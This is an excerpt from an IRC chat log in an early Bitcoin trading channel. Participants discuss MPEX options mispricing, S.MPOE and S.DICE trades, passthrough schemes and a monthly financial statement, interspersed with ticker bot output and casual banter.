22 23:00:07 When can I buy parts of Kako? Feb 22 23:00:29 Namworld it was originally, believe it or not, preparing for a bitbond listing (amazingrando's thing) Feb 22 23:00:32 that deal fell through. Feb 22 23:00:40 so the entire mpex community didn't end up scammed Feb 22 23:00:49 eh Feb 22 23:01:08 i kept it on the books there for months, then eventually when we were preparing to launch bitbet i moved it to k.kbrl Feb 22 23:01:29 i'll get rid of it one of these days, but what's the hurry. Feb 22 23:01:45 thestringpuller: Herrro??? Feb 22 23:01:49 yo Feb 22 23:01:56 actually... Feb 22 23:02:03 what did you mean, get you futures/ Feb 22 23:02:14 can I send you money for diff futures? Feb 22 23:02:22 push them to smickles Feb 22 23:02:45 i can do it, too Feb 22 23:02:46 there, i've updated it. Feb 22 23:02:46 ok Feb 22 23:02:53 how many and what price? Feb 22 23:02:55 I offered too jurov... no answer Feb 22 23:03:07 im at work Feb 22 23:03:08 lol Feb 22 23:03:13 He wants bugpowder. Feb 22 23:03:13 on a phone Feb 22 23:03:29 i didnt see your msg Namworld Feb 22 23:04:06 We need some bit news about s.dice.. it seems to be out of the spotlight lately Feb 22 23:04:13 mp, do you have any new assets in the pipeline for mpex? Feb 22 23:04:24 probably not a bad thing to be out of the spotlight Feb 22 23:04:28 it got a LOT of press Feb 22 23:04:30 lol, he just created option upwards to 75 Feb 22 23:04:48 but seems he isn't selling them atm Feb 22 23:04:56 only after opex Feb 22 23:05:03 last 24 hours are too easy to game the system Feb 22 23:05:15 afraid to go to the gym. Feb 22 23:05:21 bugpowder... bugpowder... bugpowder everywhere on my screen! Mothra must be around. Feb 22 23:05:22 might need to exercise the options Feb 22 23:05:29 DUST Feb 22 23:05:39 !ticker m s.mpoe Feb 22 23:05:41 [MPEX:S.MPOE] 1D: 0.00063035 / 0.00063769 / 0.00064369 (1230906 shares, 784.94 BTC), 7D: 0.000622 / 0.00064929 / 0.00068894 (10550014 shares, 6,850.11 BTC), 30D: 0.00059613 / 0.00066482 / 0.0007 (72358008 shares, 48,105.59 BTC) Feb 22 23:05:51 can we bid this shit back up to .0007 please Feb 22 23:06:06 it will soon Feb 22 23:06:13 after divs Feb 22 23:06:19 that makes sens Feb 22 23:06:23 ok Feb 22 23:06:29 gotta go get ripped. Feb 22 23:06:53 no crashing the market while I'm gone. Feb 22 23:06:58 We should have the profit statement released soon Feb 22 23:07:05 Bugpowder, no worries Feb 22 23:07:07 well after opex Feb 22 23:07:18 We'll just dump 5 million BTC on the market Feb 22 23:07:26 unless you are REALLY gonna crash it Feb 22 23:07:31 I'm cool with that too Feb 22 23:10:06 lemme cash out before you dump it lol Feb 22 23:10:37 You'll cash out at 1 USD/BTC like everyone else while I buy... Feb 22 23:11:42 same Feb 22 23:11:52 mod6 Feb 22 23:12:10 thestringpuller: Feb 22 23:12:28 [BTCTC] [RSM] 148 @ 0.008 = 1.184 BTC [-] Feb 22 23:12:46 [BTCTC] [RSM] 1 @ 0.00784 BTC [-] Feb 22 23:12:57 [BTCTC] [RSM] 1 @ 0.00351 BTC [-] Feb 22 23:12:58 cashing out at 50 bucks, buying back at 2 dollars :3 Feb 22 23:13:43 whatever happened to erik ? Feb 22 23:13:53 the bike man? Feb 22 23:16:19 [MPEX] [O.BTCUSD.C070N] 1000 @ 0.95853928 = 958.5393 BTC [+] Feb 22 23:16:22 [MPEX] [O.BTCUSD.C050N] 1000 @ 0.99946531 = 999.4653 BTC [+] Feb 22 23:16:45 someone said he's been in meetings all week Feb 22 23:17:04 assuming you mean evoor Feb 22 23:17:09 maybe hes selling to a big player Feb 22 23:17:37 Who buys calls at 0.99946531? Feb 22 23:17:38 or talking to the feds Feb 22 23:17:51 That's almost impossible to be worth more than that... Feb 22 23:23:45 [BTCTC] [GSDPT] 1 @ 0.00608 BTC [+] Feb 22 23:25:49 i'd like someone to sell me C750N Feb 22 23:25:57 but tomorrow Feb 22 23:26:19 or at least C500N Feb 22 23:27:00 sdice profit = 1998BTC the day Feb 22 23:27:07 or C1000N lol Feb 22 23:27:16 awesome Feb 22 23:27:27 *for the day Feb 22 23:27:30 12000+ BTC for the month Feb 22 23:27:56 mhm Feb 22 23:27:58 * price sinks * Feb 22 23:27:59 nb i guess Feb 22 23:28:17 slow month for dice Feb 22 23:28:20 it's great Feb 22 23:28:28 nah, everyone got spoiled by the whale Feb 22 23:28:46 jurov well you're gonna be able to buy from teh bot. Feb 22 23:28:48 how much of that 12k is from the whale Feb 22 23:29:33 mircea_popescu iirc when new options up to 35 were created, there was no offer for a long time there Feb 22 23:29:36 not sure Feb 22 23:29:55 jurov no ? Feb 22 23:30:11 but i may remember wrongly. Feb 22 23:30:26 they were created the 24th and were on offer normally after the 25th of last month Feb 22 23:30:27 ah 2k profit Feb 22 23:31:30 currently we're scratching heads over a VERY FUCKING WEIRD THING. Feb 22 23:31:36 look at how the bot values far calls. Feb 22 23:31:43 O.BTCUSD.C590N 0.02835972 Feb 22 23:31:52 O.BTCUSD.C590N 0.02835972 Feb 22 23:31:59 O.BTCUSD.C630N 0.00015275 Feb 22 23:32:07 O.BTCUSD.C730N 0.00020444 Feb 22 23:32:10 i mean da fuck ?! Feb 22 23:32:24 looks like it misparsed the strike Feb 22 23:32:28 c730 are worth like 30% more than c630 ? srsly ? Feb 22 23:32:38 dunno Feb 22 23:34:30 [MPEX] [S.MPOE] 4321 @ 0.00064114 = 2.7704 BTC [-] Feb 22 23:34:32 [MPEX] [S.MPOE] 3729 @ 0.00064096 = 2.3901 BTC [-] Feb 22 23:42:19 iphone facebook app allows free calls now Feb 22 23:43:48 [MPEX] [S.MPOE] 361 @ 0.00064369 = 0.2324 BTC [+] Feb 22 23:43:50 [MPEX] [S.MPOE] 4321 @ 0.00064385 = 2.7821 BTC [+] Feb 22 23:43:53 [MPEX] [S.MPOE] 11400 @ 0.00064386 = 7.34 BTC [+] Feb 22 23:50:38 I re-read the The Ceausescu article. I forgot that I already read it before, but it was a good review. Feb 22 23:50:50 That Judge was something else though, you're right. Feb 23 00:05:26 does it get through gt at all ? Feb 23 00:13:04 [MPEX] [S.DICE] 315 @ 0.006 = 1.89 BTC [-] Feb 23 00:13:06 [MPEX] [S.DICE] 765 @ 0.00609 = 4.6589 BTC [+] Feb 23 00:15:18 mircea_popescu: what is the eta for mpoe financials? Feb 23 00:16:06 well the month has to close first Feb 23 00:16:24 that's a coupla hours away. Feb 23 00:16:36 then i gotta write it. so probably later tonight. Feb 23 00:19:05 mircea_popescu: Hey man! Feb 23 00:19:15 mircea_popescu: I noticed that mispricing last month too Feb 23 00:19:20 heya. Feb 23 00:19:20 it was less obvious though Feb 23 00:19:32 I figured you have some long tail fudge factor that blows up Feb 23 00:19:44 Bugpowder not rly. Feb 23 00:22:04 but the emergency retcon 2 months ago was so much fun :) Feb 23 00:22:54 the who ? Feb 23 00:23:14 or when it was.. you issued bogus s.mpoe dividend Feb 23 00:23:18 o o Feb 23 00:23:21 ya lol Feb 23 00:23:22 then had to stop the world Feb 23 00:23:23 mircea_popescu: does the mpoe bot actually perform a spilt to fund the positions, or does it dynamically value the exposure? Feb 23 00:24:19 Bugpowder that's not specified. Feb 23 00:24:30 when will the Feb 23 00:24:39 february financials be up? Feb 23 00:24:53 thestringpuller aome time after midnight UTC Feb 23 00:25:07 on midnight the month closes Feb 23 00:25:09 didn't someone ask me this like 15 minutes ago ? Feb 23 00:25:27 wait. you just asked this. wtf's your hurry man ? Feb 23 00:25:27 where is the pic woth the waiting cats Feb 23 00:25:33 *with Feb 23 00:26:09 http://www.catsncats.com/galleries/street-cats-waiting-for-fishers.gif Feb 23 00:27:32 mircea_popescu, the new key will not work until the 10th, correct? Feb 23 00:27:45 jborkl yes. Feb 23 00:27:56 Thank you Feb 23 00:28:28 jborkl i dunno if you were here, but jurov announced the pympex fork is updated and will failover by itelf earlier. Feb 23 00:28:49 https://github.com/jurov/pyMPEx Feb 23 00:28:51 oh, no I didn't see that- thanks Feb 23 00:29:41 i didnt know i already asked mircea_popescu Feb 23 00:29:54 i am at work on a phone hard to see things Feb 23 00:30:11 other people asked... and usagi on btctalk, too Feb 23 00:30:33 oh yes, phonesex... hard to concentrate Feb 23 00:31:46 https://intersango.com/ Feb 23 00:31:48 lol wtf Feb 23 00:31:53 idiots. Feb 23 00:31:57 http://jpkoning.blogspot.ro/2013/02/financial-deepening-and-currency.html Feb 23 00:32:11 ^ bitcoin is gaining attention of economist ppl. Feb 23 00:32:37 >Disclaimer: I am long SatoshiDice and several bitcoin mining stocks. Feb 23 00:32:39 O_o Feb 23 00:33:09 yeh Feb 23 00:33:10 Yeah Feb 23 00:33:25 but we need someone like usagi to be a buyer of last resort for S.DICE Feb 23 00:33:37 kakobrekla lol that's so funny, "team intersango" Feb 23 00:33:39 it's like... Feb 23 00:33:49 if there WERE a team they wouldn't need this would they Feb 23 00:33:52 team inter-scam-go Feb 23 00:34:11 hehe Feb 23 00:34:17 That is a remarkable message Feb 23 00:34:27 I have never seen something less professional Feb 23 00:34:29 hey im going to take a crap Feb 23 00:34:34 so im gonna take assbot down Feb 23 00:34:37 Bugpowder at least it has css and no numbers. Feb 23 00:34:38 brb 20min Feb 23 00:34:54 lmao take a crap, assbot, this is too funny Feb 23 00:35:48 my fantasies with assbot just got unwanted inspiration Feb 23 00:35:59 hey mircea_popescu, when are the mpoe financials published ? Feb 23 00:36:05 omfg!!1 Feb 23 00:38:05 assbot does caviar? Feb 23 00:38:11 must.stop.thinking. Feb 23 00:42:13 ;;ticker Feb 23 00:42:14 BTCUSD ticker | Best bid: 30.16700, Best ask: 30.31000, Bid-ask spread: 0.14300, Last trade: 30.31000, 24 hour volume: 66824.74035661, 24 hour low: 29.67001, 24 hour high: 31.30000, 24 hour vwap: 30.43564 Feb 23 00:44:06 ouch Feb 23 00:44:20 this is the high Feb 23 00:44:23 CALLING IT Feb 23 00:44:28 LOAD UP ON PUTS NOW Feb 23 00:44:41 actually.... wait a little bit longer to confirm Feb 23 00:44:44 5 minutes Feb 23 00:44:51 go for it Feb 23 00:44:54 lol wup Feb 23 00:44:57 wut Feb 23 00:45:01 i just added options lol. Feb 23 00:45:34 the 310N buy is mispriced Feb 23 00:46:02 C or P? Feb 23 00:46:07 oh buy Feb 23 00:46:13 scanning for a mispriced option that I can exploit.... Feb 23 00:47:06 well theta really changes things near options expiration right? Feb 23 00:47:09 Bugpowder ya but it's mispriced as in being too low. Feb 23 00:47:50 yes I know Feb 23 00:47:52 :( Feb 23 00:48:08 anyway, will sort itself presently. Feb 23 00:48:15 [BTCTC] [S.MPOE-PT] 6 @ 0.00067 = 0.004 BTC [+] Feb 23 00:49:14 ummm... .https://intersango.com/ Due to unforeseen circumstances the systems administrator will not be available for three days. Feb 23 00:49:14 As a precaution Intersango will be inaccessible until Monday Feb 25th. Feb 23 00:51:49 god damn it : To which add sums deposited as surety for 4th Friday settled option and future contracts : 1.00000000 BTC for 1 O.BTCUSD.C750N contracts. 1.00000000 BTC for 0 O.BTCUSD.P750N contracts. Feb 23 00:52:04 split 2 BTC Feb 23 00:52:54 what did you expect ?! Feb 23 00:53:20 i fergot Feb 23 00:53:34 [MPEX] [S.MPOE] 2618 @ 0.00064396 = 1.6859 BTC [+] Feb 23 00:53:35 [MPEX] [S.MPOE] 4321 @ 0.00064129 = 2.771 BTC [-] Feb 23 00:53:37 [MPEX] [S.MPOE] 23471 @ 0.00064096 = 15.044 BTC [-] Feb 23 00:53:37 it's only like 1/5000 of a pizza anyway Feb 23 00:53:38 [MPEX] [S.MPOE] 4900 @ 0.00063925 = 3.1323 BTC [-] Feb 23 00:53:40 [MPEX] [S.MPOE] 5000 @ 0.00063917 = 3.1959 BTC [-] Feb 23 00:53:42 [MPEX] [S.MPOE] 5489 @ 0.00063916 = 3.5083 BTC [-] Feb 23 00:53:44 [MPEX] [S.MPOE] 16000 @ 0.00063914 = 10.2262 BTC [-] Feb 23 00:53:46 [MPEX] [S.MPOE] 2799 @ 0.00063913 = 1.7889 BTC [-] Feb 23 00:53:48 [MPEX] [S.MPOE] 9900 @ 0.00063902 = 6.3263 BTC [-] Feb 23 00:53:48 [MPEX] [S.MPOE] 20902 @ 0.00063625 = 13.2989 BTC [-] Feb 23 00:54:43 [MPEX] [O.BTCUSD.P750N] 1 @ 1.51629088 BTC Feb 23 00:55:36 ok... this is getting silly. Playing around with 1BTC stuff then you realize like, hey, I could buy a nice dinner with that. Feb 23 00:56:36 yup Feb 23 00:56:44 [MPEX] [S.MPOE] 1498 @ 0.00063625 = 0.9531 BTC [-] Feb 23 00:56:46 [MPEX] [S.MPOE] 4321 @ 0.00063489 = 2.7434 BTC [-] Feb 23 00:56:47 thats why bit4x is switching to dBTC ;) Feb 23 00:56:47 [MPEX] [S.MPOE] 6150 @ 0.00063488 = 3.9045 BTC [-] Feb 23 00:56:49 [MPEX] [S.MPOE] 8431 @ 0.00063422 = 5.3471 BTC [-] Feb 23 00:57:30 i am looking forward to mpex options passthroughs. Feb 23 00:57:38 split 1:1000 or w/e Feb 23 00:57:59 sorta like people make gold etfs atm based on one ounce bar Feb 23 00:59:23 [MPEX] [S.MPOE] 4321 @ 0.00064392 = 2.7824 BTC [+] Feb 23 00:59:25 [MPEX] [S.MPOE] 30250 @ 0.00064409 = 19.4837 BTC [+] Feb 23 00:59:29 [MPEX] [S.MPOE] 10725 @ 0.00064629 = 6.9315 BTC [+] Feb 23 00:59:46 just use coinbr Feb 23 00:59:52 coinbr has options right? Feb 23 01:03:16 yea Feb 23 01:03:44 mircea_popescu: option passthrus for selling options? Feb 23 01:03:59 sure. Feb 23 01:04:00 you can only do mkopt on mpex Feb 23 01:05:37 like, the passthrough will raise funds and do mkopt on mpex, for 1 option? Feb 23 01:06:39 jurov do it Feb 23 01:06:46 make a joe bot Feb 23 01:07:14 actually i do have an user who asked me to split 2 BTC.. now i 'm gonna to watch carefully what happens with the collateral and everything Feb 23 01:08:22 jurov yes, buys one option worth 1 btc, sells 1000 shares in it or w/e Feb 23 01:08:22 plus multiple users autoexercise, hope i got it right Feb 23 01:09:23 lol i was just arguing for switching to uBTC in -otc, i can put it to good use here Feb 23 01:09:40 !ticker mpex s.mpoe Feb 23 01:09:41 [MPEX:S.MPOE] 1D: 0.00063035 / 0.00063869 / 0.00064629 (1248634 shares, 797.50 BTC), 7D: 0.000622 / 0.00064897 / 0.00068894 (10558696 shares, 6,852.38 BTC), 30D: 0.00059613 / 0.00066484 / 0.0007 (72433406 shares, 48,157.29 BTC) Feb 23 01:10:14 one S.MPOE for 630.35 uBTC, doesn't it look nice? Feb 23 01:10:28 two decimal places, no unwieldy zeroes Feb 23 01:14:22 besides, one has to convince me that passthroughs are profitable enough.. i just don't see how 5% of dividends is worth it Feb 23 01:14:41 [MPEX] [S.MPOE] 4321 @ 0.00064599 = 2.7913 BTC [-] Feb 23 01:14:42 [MPEX] [S.MPOE] 1829 @ 0.00064629 = 1.1821 BTC [+] Feb 23 01:14:47 [MPEX] [S.BBET] 1 @ 0.00196489 BTC [-] Feb 23 01:15:15 let somebody other do the dirty work, i'm completely content with 0.5% off every transaction Feb 23 01:15:26 jurov they're profitable for sure. Feb 23 01:15:45 read up where topace bought 5k on mpex for 60ish, sold 5k on havelock for 68ish. Feb 23 01:18:08 okay, but price may as well move against him and he may end up doing other trade with a loss Feb 23 01:19:50 i'm actually trying something like on deadterra's bitfunder stuff to get the feel of things... still not convinced Feb 23 01:20:17 well obviously. Feb 23 01:21:17 Hands on the wheel drivin' drunk I'm doing my thing; Screaming out fuck that Feb 23 01:21:42 It is nearly always worth it for the passthrough operator Feb 23 01:25:40 hm, "nearly always"... topace is the only one so far who succeeded in selling significant part of underlying asset, like million od s.dice Feb 23 01:26:09 coinbr users got quite a chunk of it, and bbet too Feb 23 01:26:15 but anyone other? Feb 23 01:26:39 1mn is like what, 6k or so ? Feb 23 01:26:40 not yet Feb 23 01:29:10 deadterra has 1mil sdice on bf Feb 23 01:29:38 [MPEX] [S.DICE] 300 @ 0.00580004 = 1.74 BTC [-] Feb 23 01:29:46 !ticker havelosk sdice Feb 23 01:29:46 You know, I've had it up to here with this Indian malarkey. Feb 23 01:29:49 !ticker havelock sdice Feb 23 01:29:51 [HAVELOCK:SDICE] 1D: 0.62151000 / 0.66050068 / 0.69000000 (132 shares, 87.18609015 BTC), 7D: 0.62151000 / 0.69016063 / 0.75100000 (1262 shares, 870.98271197 BTC), 30D: 0.44000000 / 0.66366199 / 0.89000000 (11204 shares, 7435.66888393 BTC) Feb 23 01:30:01 BingoBongo: you quotin schoolboy q and asap rocky? Feb 23 01:30:02 [MPEX] [S.DICE] 1000 @ 0.00580003 = 5.8 BTC [-] Feb 23 01:30:09 cudi Feb 23 01:30:23 go kill yourselves Feb 23 01:30:24 [MPEX] [S.DICE] 942 @ 0.00577565 = 5.4407 BTC [-] Feb 23 01:30:25 jk Feb 23 01:30:46 ;;bc,stats Feb 23 01:30:49 Current Blocks: 222611 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1164 blocks | Next Difficulty In About: 6 days, 18 hours, 25 minutes, and 6 seconds | Next Difficulty Estimate: 4377231.32576 | Estimated Percent Change: 19.89092 Feb 23 01:31:02 ;;bc,tslb Feb 23 01:31:04 Time since last block: 16 minutes and 42 seconds Feb 23 01:31:08 ;;ticker Feb 23 01:31:08 BTCUSD ticker | Best bid: 30.53483, Best ask: 30.64998, Bid-ask spread: 0.11515, Last trade: 30.53483, 24 hour volume: 68196.18755830, 24 hour low: 29.67001, 24 hour high: 31.30000, 24 hour vwap: 30.43770 Feb 23 01:33:53 ;;ticker Feb 23 01:33:54 BTCUSD ticker | Best bid: 30.54002, Best ask: 30.65000, Bid-ask spread: 0.10998, Last trade: 30.54002, 24 hour volume: 68235.20606724, 24 hour low: 29.67001, 24 hour high: 31.30000, 24 hour vwap: 30.43808 Feb 23 01:34:39 [HAVELOCK] [SDICE] 1 @ 0.68 BTC [-] Feb 23 01:35:50 has smickles been found Feb 23 01:35:51 ? Feb 23 01:36:00 ah hes here. Feb 23 01:36:16 but idle Feb 23 01:36:18 smickles' been fondled. Feb 23 01:36:28 hrm Feb 23 01:36:36 bua. Feb 23 01:36:45 i might have to go to t-town to buy him a beer. he's probably doing the whole new-dad thing. Feb 23 01:36:55 [MPEX] [S.MPOE] 5000 @ 0.00063433 = 3.1717 BTC [-] Feb 23 01:36:59 [MPEX] [S.MPOE] 4321 @ 0.00063432 = 2.7409 BTC [-] Feb 23 01:37:05 [MPEX] [S.MPOE] 6590 @ 0.00063424 = 4.1796 BTC [-] Feb 23 01:37:10 [MPEX] [S.MPOE] 7089 @ 0.00063423 = 4.4961 BTC [-] Feb 23 01:38:33 haha, funny enough they just got snow yesterday. doesn't usually happen in the valley. when I lived there we got 3" once. caused HAVOC in the am. Feb 23 01:40:28 mod6 o, i thought new dad wasn't till april Feb 23 01:44:05 [MPEX] [S.DICE] 10 @ 0.00609 = 0.0609 BTC [+] Feb 23 01:44:08 [MPEX] [S.MPOE] 4321 @ 0.00064619 = 2.7922 BTC [+] Feb 23 01:44:10 [MPEX] [S.MPOE] 1229 @ 0.00064628 = 0.7943 BTC [+] Feb 23 01:48:28 S, S.BBET overtakes S.DICE sometime in Q4 2013? Feb 23 01:49:04 *So Feb 23 01:54:38 you think ? Feb 23 01:55:14 you should make that a bbet Feb 23 01:55:25 there is. Feb 23 01:55:29 ah ok Feb 23 01:55:31 cool Feb 23 01:55:39 Probably, betting on events seems so much more attractive for the desperate enbough to have patience Feb 23 01:55:51 What's the link on the bet? Feb 23 01:56:04 those who have patience...or less than 1% of the populatoin Feb 23 01:56:11 type bbet in the searchbar Feb 23 01:56:14 there are two Feb 23 01:56:24 i think they are definitely more interesting Feb 23 01:57:14 i just put bitbet in the search bar, as kakobrekla said. http://www.google.com/search?q=bbet&complete=0 Feb 23 01:57:22 Bloed, Bodem, Eer en Trouw (BBET; "Blood, Soil, Honour and Loyalty") is a Flemish neo-Nazi group Feb 23 01:57:32 FU troll Feb 23 01:57:40 Bet made Feb 23 01:57:53 i didn't even know flemishness is large enough to have subgroups. Feb 23 01:58:08 lol Feb 23 01:58:12 also Feb 23 01:58:12 Bloed, Bodem, Eer en Trouw (BBET; "Blood, Soil, Honour and Loyalty") is a Flemish neo-Nazi group, created in 2004 from a splinter of the Flemish branch of the international Nazi skinhead organization Blood & Honour. Feb 23 01:58:19 first SS now BBET Feb 23 01:58:19 (15:40) < mircea_popescu> mod6 o, i thought new dad wasn't till april << ooh maybe you're right. Feb 23 01:58:23 NWO i tell you Feb 23 01:59:34 maybe he's got a huge list of honey-do's Feb 23 01:59:39 heheh Feb 23 02:00:11 btw, cool new options mircea Feb 23 02:01:26 yee Feb 23 02:01:34 ya, never thought i could get it with leather seats mircea_popescu Feb 23 02:01:36 :D Feb 23 02:03:02 uh wha ?! Feb 23 02:04:21 car upgrades are called options here Feb 23 02:04:31 i guess it was too much of a stretch for a global-compatable joke Feb 23 02:06:46 mircea_popescu link to your feb report? Feb 23 02:06:56 x.x Feb 23 02:07:10 you literally can't be serious. it's been five minutes! Feb 23 02:07:10 i can't click those x's Feb 23 02:07:29 i'm boarding my jet now Feb 23 02:07:54 i don't like when you say the word literally Feb 23 02:07:57 i told you that Feb 23 02:08:15 no internet on jet ? Feb 23 02:08:18 sounds like a crummy model. Feb 23 02:11:19 mircea_popescu, was i supposed to get data in "Exercises" statjson output when I held C200T ? Feb 23 02:12:37 yes. Feb 23 02:13:10 i got nothing Feb 23 02:13:19 aite, looking into it. Feb 23 02:14:51 account D0AEE7D7... and other account too Feb 23 02:18:27 jurov look now ? Feb 23 02:20:06 yes it's there Feb 23 02:23:37 ;;bc,24hprc Feb 23 02:23:38 30.46 Feb 23 02:24:40 ;;calc (30.46-20)/30.46 Feb 23 02:24:41 0.343401181878 Feb 23 02:27:40 http://trilema.com/2013/mpoe-february-2013-statement/ Feb 23 02:27:42 there it is. Feb 23 02:27:55 green month, interest 4.8 Feb 23 02:29:33 [MPEX] [S.MPOE] 4321 @ 0.00063768 = 2.7554 BTC [-] Feb 23 02:29:35 [MPEX] [S.MPOE] 4321 @ 0.00063746 = 2.7545 BTC [-] Feb 23 02:29:37 [MPEX] [S.MPOE] 9700 @ 0.00063741 = 6.1829 BTC [-] Feb 23 02:29:38 [MPEX] [S.MPOE] 9700 @ 0.00063741 = 6.1829 BTC [-] Feb 23 02:29:39 [MPEX] [S.MPOE] 7040 @ 0.00063656 = 4.4814 BTC [-] Feb 23 02:29:41 [MPEX] [S.MPOE] 2718 @ 0.00063423 = 1.7238 BTC [-] Feb 23 02:40:31 to make sure I understand how divs are dist for mpoe, what does the div per share come out to? .000000979? Feb 23 02:44:37 [MPEX] [S.MPOE] 1714 @ 0.00063425 = 1.0871 BTC [+] Feb 23 02:46:01 ;;calc 979.88886371 / 1000000000 Feb 23 02:46:02 9.7988886371e-07 Feb 23 02:46:13 yeh Feb 23 02:46:50 ;;calc 9.7988886371e-07/0.00063423 Feb 23 02:46:50 Error: invalid syntax (, line 1) Feb 23 02:46:57 your own syntax nooblet. Feb 23 02:47:10 ;;calc 0.000000979/0.00063423 Feb 23 02:47:11 0.00154360405531 Feb 23 02:47:37 seems about right. Feb 23 02:47:58 979 was total profit? Feb 23 02:50:59 yea Feb 23 02:51:03 http://trilema.com/2013/mpoe-february-2013-statement/ Feb 23 02:52:27 [MPEX] [S.MPOE] 4321 @ 0.00063994 = 2.7652 BTC [+] Feb 23 02:52:28 [MPEX] [S.MPOE] 7679 @ 0.00063995 = 4.9142 BTC [+] Feb 23 02:52:51 That's about what I expected Feb 23 02:53:12 Based on watching the entry and exit points Feb 23 02:54:09 Pretty amazing mpoe didn't get fcking killed this month. You would have expected more calls being bought during the run up Feb 23 02:54:31 YUS! Feb 23 02:54:35 bot wins again Feb 23 02:54:47 I know I got spooked out of some large call positions Feb 23 02:54:49 Bugpowder indeed. Feb 23 02:54:54 mpoe bot is finally fully profitable Feb 23 02:55:01 i think many people were expecting a massacre. Feb 23 02:55:45 interesting, why everyone went with 4.8%? just cause i announced it for MPBPT? Feb 23 02:56:18 what was total volume of mpbpt Feb 23 02:56:35 only 100 btc, 22 of those mine Feb 23 02:56:35 since no bot info for bf Feb 23 02:56:51 it's lol Feb 23 02:56:54 good use of btc for yourself jurov ;) Feb 23 02:58:04 [MPEX] [S.MPOE] 2607 @ 0.00063425 = 1.6535 BTC [-] Feb 23 02:58:09 [MPEX] [S.MPOE] 193 @ 0.00063423 = 0.1224 BTC [-] Feb 23 02:58:11 [MPEX] [S.MPOE] 3774 @ 0.00063422 = 2.3935 BTC [-] Feb 23 02:58:48 ;;bc,stats Feb 23 02:58:51 Current Blocks: 222617 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1158 blocks | Next Difficulty In About: 6 days, 17 hours, 34 minutes, and 53 seconds | Next Difficulty Estimate: 4350127.9943 | Estimated Percent Change: 19.14857 Feb 23 03:00:02 ;;calc 19.14857 * 4350127 Feb 23 03:00:02 83298711.3684 Feb 23 03:07:54 [MPEX] [S.MPOE] 4321 @ 0.00063457 = 2.742 BTC [+] Feb 23 03:08:01 [MPEX] [S.MPOE] 9579 @ 0.00063422 = 6.0752 BTC [-] Feb 23 03:11:00 ufff,coinbr autoexercises seems settled... now about the collateral Feb 23 03:15:32 ok, finally. Feb 23 03:15:56 part of mpoe bot's brain was hanging up on the volatility history of btc. Feb 23 03:16:02 problem fixed, all better, quotes make sense again. Feb 23 03:16:04 halelujah Feb 23 03:20:24 so mpoe bot is reveiving updates? Feb 23 03:22:00 not rly. Feb 23 03:25:22 ;;ticker Feb 23 03:25:22 [MPEX] [S.MPOE] 2921 @ 0.00063995 = 1.8693 BTC [+] Feb 23 03:25:22 BTCUSD ticker | Best bid: 30.25322, Best ask: 30.45399, Bid-ask spread: 0.20077, Last trade: 30.25322, 24 hour volume: 68466.44039887, 24 hour low: 29.67001, 24 hour high: 31.30000, 24 hour vwap: 30.46492 Feb 23 03:25:34 [MPEX] [S.MPOE] 4321 @ 0.00064263 = 2.7768 BTC [+] Feb 23 03:25:36 [MPEX] [S.MPOE] 13836 @ 0.00064264 = 8.8916 BTC [+] Feb 23 03:25:37 [MPEX] [S.MPOE] 34500 @ 0.00064482 = 22.2463 BTC [+] Feb 23 03:25:49 [MPEX] [S.MPOE] 3771 @ 0.00064628 = 2.4371 BTC [+] Feb 23 03:25:51 [MPEX] [S.MPOE] 41146 @ 0.00064629 = 26.5922 BTC [+] Feb 23 03:26:10 [MPEX] [S.MPOE] 3850 @ 0.00064722 = 2.4918 BTC [+] Feb 23 03:26:11 [MPEX] [S.MPOE] 21600 @ 0.00064778 = 13.992 BTC [+] Feb 23 03:26:26 [MPEX] [S.MPOE] 6500 @ 0.00064824 = 4.2136 BTC [+] Feb 23 03:26:28 [MPEX] [S.MPOE] 18562 @ 0.00064892 = 12.0453 BTC [+] Feb 23 03:26:38 [MPEX] [S.MPOE] 11800 @ 0.00064961 = 7.6654 BTC [+] Feb 23 03:26:41 [MPEX] [S.MPOE] 17500 @ 0.00065077 = 11.3885 BTC [+] Feb 23 03:26:43 [MPEX] [S.MPOE] 11190 @ 0.00065097 = 7.2844 BTC [+] Feb 23 03:26:47 [MPEX] [S.MPOE] 4400 @ 0.00065112 = 2.8649 BTC [+] Feb 23 03:26:49 [MPEX] [S.MPOE] 19730 @ 0.00065233 = 12.8705 BTC [+] Feb 23 03:26:54 [MPEX] [S.MPOE] 4450 @ 0.00065361 = 2.9086 BTC [+] Feb 23 03:26:56 [MPEX] [S.MPOE] 3300 @ 0.00065438 = 2.1595 BTC [+] Feb 23 03:26:56 [MPEX] [S.MPOE] 65900 @ 0.00065583 = 43.2192 BTC [+] Feb 23 03:26:59 [MPEX] [S.MPOE] 10000 @ 0.00065624 = 6.5624 BTC [+] Feb 23 03:27:01 [MPEX] [S.MPOE] 17900 @ 0.00065883 = 11.7931 BTC [+] Feb 23 03:27:03 [MPEX] [S.MPOE] 17135 @ 0.00065902 = 11.2923 BTC [+] Feb 23 03:27:53 heh. i guess people really were worried. Feb 23 03:28:08 damn Feb 23 03:28:24 also in the news : somebody made a mpex sh : https://github.com/gabridome/mpex-sh Feb 23 03:28:24 someone do the same for dice pweese Feb 23 03:28:38 [MPEX] [S.DICE] 350 @ 0.00572194 = 2.0027 BTC [-] Feb 23 03:28:53 [MPEX] [S.MPOE] 65688 @ 0.00066 = 43.3541 BTC [+] Feb 23 03:29:02 not that way lol Feb 23 03:29:48 [MPEX] [O.BTCUSD.C310T] 10 @ 0.28103279 = 2.8103 BTC Feb 23 03:31:51 Bugpowder_ it's fixed btw. it was choking on vol data. Feb 23 03:33:29 [BTCTC] [GSDPT] 23 @ 0.006 = 0.138 BTC [-] Feb 23 03:34:42 ya Feb 23 03:37:03 [MPEX] [S.MPOE] 4321 @ 0.00065995 = 2.8516 BTC [-] Feb 23 03:37:05 [MPEX] [S.MPOE] 3279 @ 0.00066013 = 2.1646 BTC [+] Feb 23 03:37:13 [MPEX] [O.BTCUSD.C310N] 15 @ 0.42134962 = 6.3202 BTC Feb 23 03:38:16 C750Ns have break even point near 100.. i'm not so bullish :D Feb 23 03:38:30 so go in the midmarket Feb 23 03:38:33 maybe someone fills. Feb 23 03:39:20 think of it as 0.00000002 current bid 0.17214117 buyout. Feb 23 03:45:06 um... but looks like whoever thinks of going long and does similar maths like me Feb 23 03:45:28 ends up with decision to buy lowest call available Feb 23 03:45:48 m ? Feb 23 03:46:12 the higher ones seem to have no advantage at all, even considering their bit lower price Feb 23 03:48:21 bitcoin price crashing Feb 23 03:48:59 jurov i don't follow that logic. Feb 23 03:49:02 ;;ticker Feb 23 03:49:02 BTCUSD ticker | Best bid: 30.12341, Best ask: 